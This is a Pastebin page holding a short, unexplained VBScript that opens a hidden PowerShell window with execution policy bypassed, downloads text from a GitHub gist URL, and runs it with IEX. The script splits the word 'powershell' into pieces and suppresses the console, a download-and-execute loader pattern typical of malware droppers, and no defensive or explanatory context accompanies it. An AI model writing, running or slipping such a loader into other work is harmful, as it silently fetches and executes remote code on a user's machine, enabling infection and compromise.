Advertisement
rgabriel

Untitled

Dec 4th, 2019
212
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. const CONSOLE_HIDE=0
  2. const CONSOLE_SHOW=1
  3. const CMD_WAIT=true
  4. set oShell = wscript.createObject("WScript.Shell")
  5. oShell.run "cmd /c powers" & "hell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://gist.githubusercontent.com/raigabrielmaia/84f8fc45feb2639fe431ecd92fa86320/raw/8f1e676d95c8f258f6115ba6a92664c3e7e91345/gistfile1.txt');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; BasharBachir;", CONSOLE_HIDE, CMD_WAIT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement